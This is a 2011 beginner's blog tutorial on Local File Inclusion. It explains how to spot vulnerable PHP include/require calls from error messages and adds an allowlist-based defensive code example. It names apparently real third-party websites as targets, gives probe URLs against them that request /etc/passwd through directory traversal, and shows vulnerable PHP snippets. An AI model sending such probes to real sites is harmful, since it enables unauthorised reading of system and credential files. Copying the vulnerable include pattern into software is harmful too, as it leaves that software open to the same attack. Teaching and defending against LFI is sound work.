
Sunday, May 29, 2011

Local File Inclusion (LFI) For Beginners – Tutorial


What is LFI?
Local File Inclusion (LFI) is when you have the ability to browse through the server's files by means of directory traversal. One of the most common uses of LFI is to retrieve the /etc/passwd file, which contains the user information of a Linux system.
How to Find an LFI Vulnerability?
Example:
http://www.site.com/index.php?p=..
Real World Examples:
http://www.jedit.org/index.php?page=..
Warning: main(…html): failed to open stream: No such file or directory in /home/groups/j/je/jedit/htdocs/index.php on line 63
Warning: main(): Failed opening ‘…html’ for inclusion (include_path=’.:/usr/local/share/pear’) in /home/groups/j/je/jedit/htdocs/index.php on line 63
This one is not vulnerable.
A vulnerable page should produce a warning that looks like this:
Warning: include() [function.include]: Failed opening ‘…php’ for inclusion (include_path=’.:/usr/share/pear’) in /home/shiner/shiner.com/htdocs/beers/beers-home.php on line 62
The name in brackets, here include, is the function the script is using. For example, this script:
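<?php
// Vulnerable: the request parameter is passed straight to include()
$page = $_GET['page'];
include($page);
?>
should show [function.include], but this script:
<?php
// Vulnerable: same flaw, using require_once() instead of include()
$page = $_GET['page'];
require_once($page);
?>
should show [function.require_once] or [function.require].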
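For the defending side, the include($page) pattern shown above can be replaced with an allowlist lookup. The following is an added example, not code from the original post; resolve_page(), PAGES_DIR, ALLOWED_PAGES and the pages directory layout are assumptions.

```php
<?php
// Added example, not from the original post. PAGES_DIR and ALLOWED_PAGES are assumed names.
const PAGES_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['home', 'about', 'contact'];

// Map a user-supplied page name to an includable file; null means reject.
function resolve_page($requested, string $baseDir, array $allowed): ?string
{
    // Reject arrays (?page[]=x) and anything that is not an exact known name.
    if (!is_string($requested) || !in_array($requested, $allowed, true)) {
        return null;
    }
    // Defence in depth: canonicalise and confirm the file sits inside $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $requested . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

if (PHP_SAPI === 'cli') {
    // Self-check with constructed inputs (the parameter values shown in this post).
    $dir = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
    mkdir($dir);
    file_put_contents($dir . '/home.php', "<?php echo 'home';\n");
    foreach (['home', '..', '/etc/passwd', '../etc/passwd', 'indexm.php'] as $input) {
        $ok = resolve_page($input, $dir, ['home']) !== null;
        printf("%-14s => %s\n", $input, $ok ? 'allowed' : 'rejected');
    }
    unlink($dir . '/home.php');
    rmdir($dir);
} else {
    ini_set('display_errors', '0'); // do not leak file paths in warnings
    $page = resolve_page($_GET['page'] ?? 'home', PAGES_DIR, ALLOWED_PAGES);
    if ($page === null) {
        http_response_code(404);
        exit('Page not found');
    }
    include $page;
}
```

Run from the command line, it exercises the check against a temporary directory; served by a web server, it includes only files named in the allowlist and returns 404 for everything else.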
[- Find Example (Real) -]
http://www.crew4sea.com/indexm.php?url=..
gives us:
Fatal error: require_once() [function.require]: Failed opening required ‘./..’ (include_path=’.:/:/usr/php/pear’) in /indexm.php on line 164
The message shows [function.require], so we know it is vulnerable.
If the server runs Windows, you can just request:
http://www.crew4sea.com/indexm.php?url=indexm.php
Other things to try:
http://www.crew4sea.com/indexm.php?url=/etc/passwd
http://www.crew4sea.com/indexm.php?url=../etc/passwd
until you get something.
